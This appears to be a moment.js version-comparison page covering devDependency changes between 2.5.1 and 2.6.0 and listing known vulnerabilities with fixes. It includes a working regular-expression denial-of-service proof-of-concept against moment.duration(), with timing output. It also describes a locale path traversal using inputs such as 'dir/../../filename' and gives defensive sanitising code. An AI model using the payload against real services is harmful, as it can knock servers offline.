Moment.js saw a significant update from version 2.5.1 to 2.6.0 in April 2014, building upon its core functionalities for parsing, manipulating, and displaying dates in JavaScript. Both versions maintained the same core purpose, serving as essential tools for developers dealing with date and time operations.
Looking at the differences, 2.6.0 primarily brings updates to the developer tooling used in the project, offering a more streamlined development experience for those contributing to Moment.js itself. Notably, the specific version constraints for Karma and related plugins like karma-nodeunit and karma-sauce-launcher were removed, indicated by the shift from "~0.11.0", "~0.7.2", "~0.1.1", and "~0.1" to "latest". This transition suggests either an improvement in compatibility with newer versions of those tools or a desire to remain consistently up-to-date with the latest testing and Continuous Integration (CI) features within the Moment.js development workflow; the trade-off is that an unpinned "latest" devDependency makes the test environment less reproducible from one install to the next. The previous version, 2.5.1, released in January 2014, demonstrated a more cautious approach to dependency management by enforcing specific version ranges. For developers solely using Moment.js within their projects, the changes relate to the testing and build environment, not to features that directly affect the public API or usage, so upgrading brings mostly underlying changes to development dependencies. Both versions expose the same features for parsing, validating, manipulating, and formatting dates.
All known vulnerabilities affecting version 2.6.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Builds a string of len + 1 copies of chr. Note that the loop counter i is an
// undeclared global shared with the loop below, which is why the reported
// COUNT advances by 10001 rather than 10000 on each iteration of the run shown.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Time moment.duration() on progressively longer inputs of the form "-111...1".
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start); // [seconds, nanoseconds] elapsed
  console.log(end);
}
```
Sample run; the elapsed time (reported as [seconds, nanoseconds]) grows much faster than the input length:

```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low-severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
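The two mitigations above (validating a locale name before it reaches moment.locale(), and bounding what is handed to moment.duration()) as an added example; this is not code from moment.js or from the advisories. The locale key pattern, the length cap and the knownLocales list are this example's own assumptions, and the list is a constructed stand-in for what moment.locales() would return in a real application.

```javascript
// Constructed sample of the locale keys an application has loaded; in a real
// deployment this would come from moment.locales() after the locale bundles load.
const knownLocales = ['en', 'fr', 'de', 'en-gb', 'pt-br', 'zh-cn'];

// Shape of a moment locale key: a language subtag plus optional hyphenated
// subtags, lower-case. Path separators and dots (as in '../../x' or 'fr/../../x')
// never match, so traversal-shaped input is rejected before any file lookup.
const LOCALE_KEY = /^[a-z]{2,3}(-[a-z0-9]{2,8})*$/;

// Returns a locale key that is safe to pass to moment.locale(), or the fallback
// when the input is missing, malformed, or not one of the loaded locales.
// Allowlisting against knownLocales is the real control; the regex is a cheap
// first filter that also keeps the log output readable on rejection.
function safeLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const key = input.trim().toLowerCase();
  if (!LOCALE_KEY.test(key)) return fallback;
  return knownLocales.includes(key) ? key : fallback;
}

// Legitimate duration strings (ISO 8601 'P1DT2H', 'HH:mm:ss', numeric) are
// short; capping the length bounds the work a backtracking regex can be made
// to do. The cap is an assumption chosen for this example.
const MAX_DURATION_LEN = 64;

// Returns the string if it is short enough to hand to moment.duration(),
// otherwise null so the caller can reject the request instead of parsing it.
function safeDurationInput(input) {
  if (typeof input !== 'string' || input.length > MAX_DURATION_LEN) return null;
  return input;
}
```

Apply safeLocale() and safeDurationInput() at the request boundary, before the value reaches moment; a null or fallback result should be treated as a rejected request rather than silently parsed.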